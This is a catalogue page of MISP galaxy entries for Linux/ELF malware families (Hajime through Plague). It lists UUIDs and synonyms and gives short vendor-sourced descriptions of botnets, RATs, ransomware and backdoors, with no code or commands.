UUID ff8ee85f-4175-4f5a-99e5-0cbc378f1489 which can be used as unique global reference for Hajime in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Hakai

Internal MISP references

UUID 0839c28a-ea11-44d4-93d1-24b246ef6743 which can be used as unique global reference for Hakai in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

HandyMannyPot

Internal MISP references

UUID 0b323b91-ad57-4127-99d1-6a2485be70df which can be used as unique global reference for HandyMannyPot in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Hand of Thief

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Hand of Thief.

Known Synonyms
Hanthie
Internal MISP references

UUID db3e17f0-677b-4bdb-bc26-25e62a74673d which can be used as unique global reference for Hand of Thief in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

HeadCrab

Internal MISP references

UUID 7bb684d8-ad5c-4d01-91eb-2c600dbcda2a which can be used as unique global reference for HeadCrab in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

HellDown

Ransomware.

Internal MISP references

UUID 6dd0e6e4-536b-4271-a948-39282ff48940 which can be used as unique global reference for HellDown in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

HelloBot (ELF)

Internal MISP references

UUID b9fec670-2b1e-4287-ac93-68360d5adcf4 which can be used as unique global reference for HelloBot (ELF) in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

HelloKitty (ELF)

Linux version of the HelloKitty ransomware.

Internal MISP references

UUID 785cadf7-5c99-40bc-b718-8a98d9aa90b7 which can be used as unique global reference for HelloKitty (ELF) in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

HiatusRAT

Lumen discovered this malware used in campaign targeting business-grade routers using a RAT they call HiatusRAT and a variant of tcpdump for traffic interception.

Internal MISP references

UUID 69dcee87-dc61-48d4-a6af-177396bdb850 which can be used as unique global reference for HiatusRAT in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

HiddenWasp

HiddenWasp is a Linux-based Trojan used to target systems for remote control. It comes in the form of a statically linked ELF binary with stdlibc++.

Internal MISP references

UUID ae00d48d-c515-4ca9-a29c-8c53a78f8c73 which can be used as unique global reference for HiddenWasp in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Hide and Seek

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Hide and Seek.

Known Synonyms
HNS
Internal MISP references

UUID 41bf8f3e-bb6a-445d-bb74-d08aae61a94b which can be used as unique global reference for Hide and Seek in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

HinataBot

HinataBot is a Go-based DDoS-focused botnet. It was observed in the first quarter of 2023 targeting HTTP and SSH endpoints leveraging old vulnerabilities and weak credentials. Amongst those infection vectors are exploitation of the miniigd SOAP service on Realtek SDK devices (CVE-2014-8361), Huawei HG532 routers (CVE-2017-17215), and exposed Hadoop YARN servers.

Internal MISP references

UUID b10fc382-b740-417a-98fa-e23d10223958 which can be used as unique global reference for HinataBot in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Hipid

Internal MISP references

UUID d55eb2f1-e24d-4b50-9839-2e53b5059bae which can be used as unique global reference for Hipid in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Hive (ELF)

Internal MISP references

UUID c22452c8-c818-4577-9737-0b87342c7913 which can be used as unique global reference for Hive (ELF) in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Horse Shell

Checkpoint Research describes this as part of a custom firmware image affiliated with the Chinese state-sponsored actor “Camaro Dragon”, a custom MIPS32 ELF implant. HorseShell, the main implant inserted into the modified firmware by the attackers, provides the attacker with 3 main functionalities: * Remote shell: Execution of arbitrary shell commands on the infected router * File transfer: Upload and download files to and from the infected router. * SOCKS tunneling: Relay communication between different clients.

Internal MISP references

UUID 9d04d96a-92fd-4731-a3b5-a3fdafd3e523 which can be used as unique global reference for Horse Shell in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Hubnr

Internal MISP references

UUID c55389b0-e778-4cf9-9030-3d1efc1224c9 which can be used as unique global reference for Hubnr in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

HyperSSL (ELF)

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular HyperSSL (ELF).

Known Synonyms
SysUpdate
Internal MISP references

UUID 263aaef5-9758-49f1-aff1-9a509f545bb3 which can be used as unique global reference for HyperSSL (ELF) in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

iceFire

Internal MISP references

UUID c03b2f7f-31ed-4133-b947-4b8846d90f19 which can be used as unique global reference for iceFire in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Icnanker

Internal MISP references

UUID cd9f128b-6502-4e1b-a5b3-25f3c7f01ca3 which can be used as unique global reference for Icnanker in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

INC

Internal MISP references

UUID fa3f90a3-40e3-4636-90f9-3e02bf645afd which can be used as unique global reference for INC in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Interlock (ELF)

According to Sekoia, this is the ransomware used by the Interlock ransomware intrusion set, which was first observed in September 2024 conducting Big Game Hunting and double extortion campaigns.

Internal MISP references

UUID d43c0e42-27e5-4eeb-aeca-65f3eec67d6f which can be used as unique global reference for Interlock (ELF) in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

elf.iocontrol

IOControl is a Linux backdoor which targets ARM-based IoT and OT systems, which a particular focus on Fuel and Industrial Control Systems.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular elf.iocontrol.

Known Synonyms
OrpraCab
QueueCat
Internal MISP references

UUID d681df67-ea57-4384-a8bc-8f24f811000b which can be used as unique global reference for elf.iocontrol in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

IoT Reaper

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular IoT Reaper.

Known Synonyms
IoTroop
Reaper
iotreaper
Internal MISP references

UUID 37c357a1-ec09-449f-b5a9-c1ef1fba2de2 which can be used as unique global reference for IoT Reaper in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

IPStorm (ELF)

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular IPStorm (ELF).

Known Synonyms
InterPlanetary Storm
Internal MISP references

UUID a24f9c4b-1fa7-4da2-9929-064345389e67 which can be used as unique global reference for IPStorm (ELF) in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

IZ1H9

ccording to Fortinet, this is a Mirai-based DDoS botnet.

Internal MISP references

UUID 6e98a149-9ce2-4750-9680-69f3ced5f33e which can be used as unique global reference for IZ1H9 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

JenX

Internal MISP references

UUID 6a4365fc-8448-4270-ba93-0341788d004b which can be used as unique global reference for JenX in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

J-Magic

According to Lumen, J-Magic is a variant of cd00r and passively scans for five different predefined parameters before activating. If any of these parameters or “magic packets” are received, the agent sends back a secondary challenge. Once that challenge is complete, J-magic establishes a reverse shell on the local file system, allowing the operators to control the device, steal data, or deploy malicious software.

Internal MISP references

UUID 7398222a-c9a5-4f59-8799-1f8fce3604c8 which can be used as unique global reference for J-Magic in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Kaden

Kaden is a DDoS botnet that is heavily based on Bashlite/Gafgyt. Next to DDoS capabilities it contains wiper functionality, which currently can not be triggerred (yet).

Internal MISP references

UUID eebd19b4-6671-4b17-be6a-cc467e5869a5 which can be used as unique global reference for Kaden in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Kaiji

Surfaced in late April 2020, Intezer describes Kaiji as a DDoS malware written in Go that spreads through SSH brute force attacks. Recovered function names are an English representation of Chinese words, hinting about the origin. The name Kaiji was given by MalwareMustDie based on strings found in samples.

Internal MISP references

UUID 33fe7943-c1b3-48d5-b287-126390b091f0 which can be used as unique global reference for Kaiji in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Kaiten

According to netenrich, Kaiten is a Trojan horse that opens a back door on the compromised computer that allows it to perform other malicious activities. The trojan does not create any copies of itself. This Backdoor arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Kaiten.

Known Synonyms
STD
Internal MISP references

UUID 9b618703-58f6-4f0b-83a4-d4f13e2e5d12 which can be used as unique global reference for Kaiten in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

kerberods

Internal MISP references

UUID e3787d95-2595-449e-8cf9-90845a9b7444 which can be used as unique global reference for kerberods in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

KEYPLUG

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular KEYPLUG.

Known Synonyms
ELFSHELF
Internal MISP references

UUID 2c4bfc14-3ea4-4ced-806a-fcac30b2a9d7 which can be used as unique global reference for KEYPLUG in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

kfos

Internal MISP references

UUID 5e353bc2-4d32-409b-aeb6-c7df32607c56 which can be used as unique global reference for kfos in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Kinsing

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Kinsing.

Known Synonyms
h2miner
Internal MISP references

UUID ef0e3a56-e614-4dc1-bb20-0dcf7215c1ea which can be used as unique global reference for Kinsing in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

kitty-socks5

Internal MISP references

UUID 687213a8-2e55-4a89-add7-b79e6fd5e46a which can be used as unique global reference for kitty-socks5 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

KIVARS (ELF)

Internal MISP references

UUID e8b24118-4ce8-471b-8683-1077a0f5f2a9 which can be used as unique global reference for KIVARS (ELF) in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Kobalos

Internal MISP references

UUID 201d54ae-7fb0-4522-888c-758fa9019737 which can be used as unique global reference for Kobalos in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Krasue RAT

Internal MISP references

UUID b111325d-dd90-47cc-8777-fcb7e610a76e which can be used as unique global reference for Krasue RAT in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

KrustyLoader

ELF x64 Rust downloader first discovered on Ivanti Connect Secure VPN after the exploitation of CVE-2024-21887 and CVE-2023-46805. Downloads Sliver backdoor and deletes itself.

Internal MISP references

UUID 1a5d8c38-42fa-4405-83fc-4e07b4407205 which can be used as unique global reference for KrustyLoader in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

KTLVdoor (ELF)

According to Trend Micro, KTLVdoor is a highly obfuscated malware that masquerades as different system utilities, allowing attackers to carry out a variety of tasks including file manipulation, command execution, and remote port scanning.

Internal MISP references

UUID 3ee0b08d-b872-4eda-8f8f-6d2f37b053ae which can be used as unique global reference for KTLVdoor (ELF) in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Kubo Injector

According to the author if this open source project, this is a library for injecting a shared library into a Linux, Windows and MacOS process.

Internal MISP references

UUID ad8b5e47-338f-42ff-8aed-a455f697d5a7 which can be used as unique global reference for Kubo Injector in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Kuiper (ELF)

Internal MISP references

UUID 30ad3f49-bffd-4383-88b3-067ccfac7038 which can be used as unique global reference for Kuiper (ELF) in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Lady

Internal MISP references

UUID f8b91c34-b4f0-4ef2-b9fb-15bd5ec0a66d which can be used as unique global reference for Lady in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

LeetHozer

Internal MISP references

UUID e9f2857a-cb91-4715-ac8b-fdc89bc9a03e which can be used as unique global reference for LeetHozer in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Lightning Framework

Internal MISP references

UUID 927bc8fc-fef4-4331-877d-18bcd33bdf9c which can be used as unique global reference for Lightning Framework in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

LiLock

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular LiLock.

Known Synonyms
Lilocked
Lilu
Internal MISP references

UUID 1328ed0d-9c1c-418b-9a96-1c538e4893bc which can be used as unique global reference for LiLock in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

lilyofthevalley

Internal MISP references

UUID f789442f-8f50-4e55-8fbc-b93d22b5314e which can be used as unique global reference for lilyofthevalley in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

LinkPro

According to Synacktiv, LinkPro targets the GNU/Linux systems and is developed in Golang. It is named after its main module and the corresponding (private) GitHub repository. LinkPro uses eBPF technology, to activate only when receiving a "magic package", and to hide on the compromised system.

Internal MISP references

UUID ae50535d-9f43-4131-9b2e-46c8fadcbda5 which can be used as unique global reference for LinkPro in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Linodas

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Linodas.

Known Synonyms
DinodasRAT
XDealer
Internal MISP references

UUID e47295eb-e907-410a-ab16-62ed8652d8bf which can be used as unique global reference for Linodas in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

LiquorBot

BitDefender tracked the development of a Mirai-inspired botnet, dubbed LiquorBot, which seems to be actively in development and has recently incorporated Monero cryptocurrency mining features. Interestingly, LiquorBot is written in Go (also known as Golang), which offers some programming advantages over traditional C-style code, such as memory safety, garbage collection, structural typing, and even CSP-style concurrency.

Internal MISP references

UUID 3fe8f3db-4861-4e78-8b60-a794fe22ae3f which can be used as unique global reference for LiquorBot in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

LittleDaemon

According to ESET Research, LittleDaemon is the first stage deployed on the victim’s machine through hijacked updates. It was observed in both DLL and executable versions, both of them 32-bit PEs. The main purpose of LittleDaemon is to communicate with the hijacking node to obtain the downloader that we call DaemonicLogistics. LittleDaemon does not establish persistence.

Internal MISP references

UUID cb4b6ab8-5f13-4635-b67b-6d49a545402d which can be used as unique global reference for LittleDaemon in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

LockBit (ELF)

Internal MISP references

UUID afce6aba-d4c4-49fa-b9a9-1a70e92e5a0e which can be used as unique global reference for LockBit (ELF) in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Loerbas

Loader and Cleaner components used in attacks against high-performance computing centers in Europe.

Internal MISP references

UUID 6332d57c-c46f-4907-8dac-965b15ffbed6 which can be used as unique global reference for Loerbas in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Log Collector

Internal MISP references

UUID 0473214a-2daa-4b5b-84bc-1bcbab11ef80 which can be used as unique global reference for Log Collector in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Lootwodniw

Internal MISP references

UUID cfcf8608-03e7-4a5b-a46c-af342db2d540 which can be used as unique global reference for Lootwodniw in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Luna

ESXi encrypting ransomware written in Rust.

Internal MISP references

UUID bc9022d6-ee65-463f-9823-bc0f96963a75 which can be used as unique global reference for Luna in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

LZRD

According to Akamai, a Mirai variant exploiting GeoVision IoT devices, (possibly CVE-2024-6047 and/or CVE-2024-11120).

Internal MISP references

UUID d705d9cf-279d-40ef-8447-8d35604a2bed which can be used as unique global reference for LZRD in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Manjusaka (ELF)

Cisco Talos compared this RAT to Cobalt Strike and Sliver. Written in Rust.

Internal MISP references

UUID cd3a3a96-af66-4470-8115-b8bf3eef005a which can be used as unique global reference for Manjusaka (ELF) in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

MASOL

Internal MISP references

UUID ab541e72-13a1-4156-af0b-144e1ad5aeb3 which can be used as unique global reference for MASOL in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Masuta

Masuta is a variant of Mirai that targets IoT devices, primarily routers, using dictionary attacks to target weak credentials. PureMasuta is a variant of Masuta that targets the EDB 38722 D-Link HNAP Bug.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Masuta.

Known Synonyms
PureMasuta
Internal MISP references

UUID b9168ff8-01df-4cd0-9f70-fe9e7a11eccd which can be used as unique global reference for Masuta in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Matryosh

Internal MISP references

UUID 4e989704-c49f-468c-95e1-1b7c5a58b3c4 which can be used as unique global reference for Matryosh in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Melofee

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Melofee.

Known Synonyms
Mélofée
Internal MISP references

UUID 1ffd85bd-389c-4e04-88fd-8186423c3691 which can be used as unique global reference for Melofee in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

MESSAGETAP

MESSAGETAP is a 64-bit ELF data miner initially loaded by an installation script. It is designed to monitor and save SMS traffic from specific phone numbers, IMSI numbers and keywords for subsequent theft.

Internal MISP references

UUID a07d6748-3557-41ac-b55b-f4348dc2a3c7 which can be used as unique global reference for MESSAGETAP in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Midrashim

A x64 ELF file infector with non-destructive payload.

Internal MISP references

UUID fe220358-7118-4feb-b43e-cbdaf2ea09dc which can be used as unique global reference for Midrashim in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

MiKey

Internal MISP references

UUID aae3b83d-a116-4ebc-aae0-f6327ef174ea which can be used as unique global reference for MiKey in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Mirai (ELF)

Mirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Mirai (ELF).

Known Synonyms
Katana
Internal MISP references

UUID 17e12216-a303-4a00-8283-d3fe92d0934c which can be used as unique global reference for Mirai (ELF) in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Mokes (ELF)

Internal MISP references

UUID 6d5a5357-4126-4950-b8c3-ee78b1172217 which can be used as unique global reference for Mokes (ELF) in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Momentum

Internal MISP references

UUID aaf8ce1b-3117-47c6-b756-809538ac8ff2 which can be used as unique global reference for Momentum in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Monti

A ransomware, derived from the leaked Conti source code.

Internal MISP references

UUID 7df77b77-00dd-4eba-a697-b9a7be262acc which can be used as unique global reference for Monti in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

MooBot

Internal MISP references

UUID cd8deffe-eb0b-4451-8a13-11f6d291064a which can be used as unique global reference for MooBot in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Moose

Internal MISP references

UUID 7fdb91ea-52dc-499c-81f9-3dd824e2caa0 which can be used as unique global reference for Moose in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Mozi

Mozi is a IoT botnet, that makes use of P2P for communication and reuses source code of other well-known malware families, including Gafgyt, Mirai, and IoT Reaper.

Internal MISP references

UUID 236ba358-4c70-434c-a7ac-7a31e76c398a which can be used as unique global reference for Mozi in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

MrBlack

MrBlack, first identified in May 2014 by Russian security firm Dr. Web, is a botnet that targets Linux OS and is designed to conduct distributed denial-of-service (DDoS) attacks. In May 2015, Incapsula clients suffered a large-scale DDoS attack which the company attributed to network traffic generated by tens of thousands of small office/home office (SOHO) routers infected with MrBlack. This massive botnet spans over 109 countries, especially in Thailand and Brazil.

MrBlack scans for and infects routers that have not had their default login credentials changed and that allow remote access to HTTP and SSH via port 80 and port 22, respectively. One of the most impacted router brands is Ubiquiti, a U.S.-based firm that provides bulk network hub solutions for internet service providers to lease to their customers. Once a vulnerable router is compromised and MrBlack is injected into the system, a remote server is contacted and system information from the device is transmitted. This allows the host server to receive commands in order to perform different types of DDoS attacks, download and execute files, and terminate processes.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular MrBlack.

Known Synonyms
AESDDoS
Dofloo
Internal MISP references

UUID fc047e32-9cf2-4a92-861a-be882efd8a50 which can be used as unique global reference for MrBlack in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Mumblehard

Internal MISP references

UUID 5f78127b-25d3-4f86-8a64-f9549b2db752 which can be used as unique global reference for Mumblehard in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Nextcry

Ransomware used against Linux servers.

Internal MISP references

UUID 7ec8a41f-c72e-4832-a5a4-9d7380cea083 which can be used as unique global reference for Nextcry in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Ngioweb (ELF)

Internal MISP references

UUID a4ad242c-6fd0-4b1d-8d97-8f48150bf242 which can be used as unique global reference for Ngioweb (ELF) in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Nimbo-C2 (ELF)

According to the author, Nimbo-C2 is yet another (simple and lightweight) C2 framework. The agent currently supports Windows x64 and Linux. It's written in Nim, with some usage of .NET (by dynamically loading the CLR to the process).

Internal MISP references

UUID 5dbdf2ea-a15b-4ad6-bf7a-a030998c66b4 which can be used as unique global reference for Nimbo-C2 (ELF) in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

NiuB

Golang-based RAT that offers execution of shell commands and download+run capability.

Internal MISP references

UUID 7c516b66-f4a4-406a-bf35-d898ac8bffec which can be used as unique global reference for NiuB in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

NoaBot

Internal MISP references

UUID b5ee45a0-d75b-40e7-b737-3cfa1cc8246c which can be used as unique global reference for NoaBot in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Nood RAT

Internal MISP references

UUID 59ac87c0-f2ce-4e83-83bd-299e123b72a7 which can be used as unique global reference for Nood RAT in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Nosedive

According to Black Lotus Labs, Nosedive is a custom variation of the Mirai implant that is supported on all major SOHO and IoT architectures (e.g. MIPS, ARM, SuperH, PowerPC, etc.). Nosedive implants are typically deployed from Tier 2 payload servers in the Raptor Train infrastructure through a unique URL encoding scheme and domain injection method. Nosedive droppers use this method to request payloads for specific C2s by encoding the requested C2 domain and joining it with a unique "key" that identifies the bot and the target architecture of the compromised device (e.g. MIPS, ARM, etc.), which is then injected into the Nosedive implant payload that is deployed to the Tier 1 node. Once deployed, Nosedive runs in-memory only and allows the operators to execute commands, upload and download files, and run DDoS attacks on compromised devices.

The malware and its associated droppers are memory-resident only and deleted from disk. This, in addition to anti-forensics techniques employed on these devices including the obfuscation of running process names, compromising devices through a multi-stage infection chain, and killing remote management processes, makes detection and forensics much more difficult.

Internal MISP references

UUID 13840bb0-494d-403e-a37d-65cf144d71e9 which can be used as unique global reference for Nosedive in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

NOTROBIN

FireEye states that NOTROBIN is a utility written in Go 1.10 and compiled to a 64-bit ELF binary for BSD systems. It periodically scans for and deletes files matching filename patterns and content characteristics. The purpose seems to be to block exploitation attempts against the CVE-2019-19781 vulnerability; however, FireEye believes that NOTROBIN provides backdoor access to the compromised system.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular NOTROBIN.

Known Synonyms
remove_bds
Internal MISP references

UUID aaeb76b3-3885-4dc6-9501-4504fed9f20b which can be used as unique global reference for NOTROBIN in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

OrBit

According to stormshield, Orbit is a two-stage malware that appeared in July 2022, discovered by Intezer lab. Acting as a stealer and backdoor on 64-bit Linux systems, it consists of an executable acting as a dropper and a dynamic library.

Internal MISP references

UUID ae9d84f2-60e5-4a33-98f4-a0061938ec6d which can be used as unique global reference for OrBit in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Owari

Mirai variant by actor "Anarchy" that used CVE-2017-17215 in July 2018 to compromise 18,000+ devices.

Internal MISP references

UUID ec67f206-6464-48cf-a012-3cdfc1278488 which can be used as unique global reference for Owari in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

p0sT5n1F3r

According to Yarix digital security, this is a malware that allows to sniff on HTTPS traffic, implemented as Apache module.

Internal MISP references

UUID cc48c6ae-d274-4ad0-b013-bd75041a20c8 which can be used as unique global reference for p0sT5n1F3r in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

P2Pinfect

P2Pinfect is a fast-growing multi platform botnet, the purpose of which is still unknown. Written in Rust, it is compatible with Windows and Linux, including a MIPS variant for Linux based routers and IoT devices. It is capable of brute forcing SSH logins and exploiting Redis servers in order to propagate itself both to random IPs on the internet and to hosts it can find references to in files present on the infected system.

Internal MISP references

UUID 31a32308-7034-4419-b1f3-56a4d64b4358 which can be used as unique global reference for P2Pinfect in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

pbot

P2P botnet derived from the Mirai source code.

Internal MISP references

UUID 7aff049d-9326-466d-bbcc-d62da673b32c which can be used as unique global reference for pbot in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Penquin Turla

Internal MISP references

UUID 262e0cf2-2fed-4d37-8d7a-0fd62c712840 which can be used as unique global reference for Penquin Turla in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

perfctl

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular perfctl.

Known Synonyms
perfcc
Internal MISP references

UUID 5a4408f2-6ee3-4c82-9ee2-a1b4290666be which can be used as unique global reference for perfctl in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

PerlBot

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular PerlBot.

Known Synonyms
DDoS Perl IrcBot
ShellBot
Internal MISP references

UUID 24b77c9b-7e7e-4192-8161-b6727728170f which can be used as unique global reference for PerlBot in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Persirai

Internal MISP references

UUID 2ee05352-3d4a-448b-825d-9d6c10792bf7 which can be used as unique global reference for Persirai in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

PG_MEM

Internal MISP references

UUID 74ffa404-9082-4db9-ac19-18a875db9fe7 which can be used as unique global reference for PG_MEM in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

PigmyGoat

Internal MISP references

UUID fcdcdc68-4c82-4d3d-aef1-96eac0a62761 which can be used as unique global reference for PigmyGoat in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

PingPull

Internal MISP references

UUID 65a7944c-15d9-4ca5-8561-7c97b18684c8 which can be used as unique global reference for PingPull in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Pink

A botnet with P2P and centralized C&C capabilities.

Internal MISP references

UUID 67063764-a47c-4058-9cb2-1685ffa14fe8 which can be used as unique global reference for Pink in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

PITFUEL

According to Mandiant, this is a SparkGateway plugin that loads LITTLELAMB.WOOLTEA through JNI.

Internal MISP references

UUID af5d3d2c-6cb4-4890-8f06-fa76c9d684e8 which can be used as unique global reference for PITFUEL in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

PITHOOK

According to Mandiant, PITHOOK hooks the accept and accept4 functions within the web process by modifying the PLT. When PITHOOK receives a buffer matching the predefined magic byte sequence, it will duplicate the socket and forward it to PITSTOP over the Unix domain socket /data/runtime/cockpit/wd.fd.

Internal MISP references

UUID 666aa489-0e84-4f7e-a513-f3f13c18ac43 which can be used as unique global reference for PITHOOK in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

PITSOCK

According to Mandiant, this is backdoor which hooks the accept and setsockopt of the web process by modifying its procedure linkage table (PLT). This enables backdoor communication via the Unix socket /tmp/clientsDownload.sock when it receives a specific 48-byte magic byte sequence in the incoming buffer.

Internal MISP references

UUID c7c64576-526e-420c-9ec8-d6b899014c89 which can be used as unique global reference for PITSOCK in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Plague

According to Nexttron Systems, this is an implant built as a malicious PAM (Pluggable Authentication Module), enabling attackers to silently bypass system authentication and gain persistent SSH access.

